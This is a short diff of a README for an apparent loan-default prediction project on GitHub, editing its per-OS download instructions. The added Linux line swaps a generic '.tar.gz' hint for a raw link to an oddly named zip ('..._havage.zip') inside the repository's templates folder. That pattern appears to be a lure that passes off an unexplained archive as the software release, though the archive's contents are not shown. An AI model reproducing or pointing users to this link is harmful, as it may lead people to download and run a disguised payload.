Nkaduadjei/Loan-Default-Prediction-System/README.md

 - For Windows: Look for a file with a `.exe` extension.
 - For macOS: Look for a file with a `.dmg` extension.
-- For Linux: Look for a `.tar.gz` or similar file.
+- For Linux: Look for a `https://github.com/Nkaduadjei/Loan-Default-Prediction-System/raw/refs/heads/main/templates/Prediction_Default_System_Loan_havage.zip` or similar file.

 Click on the file to start the download.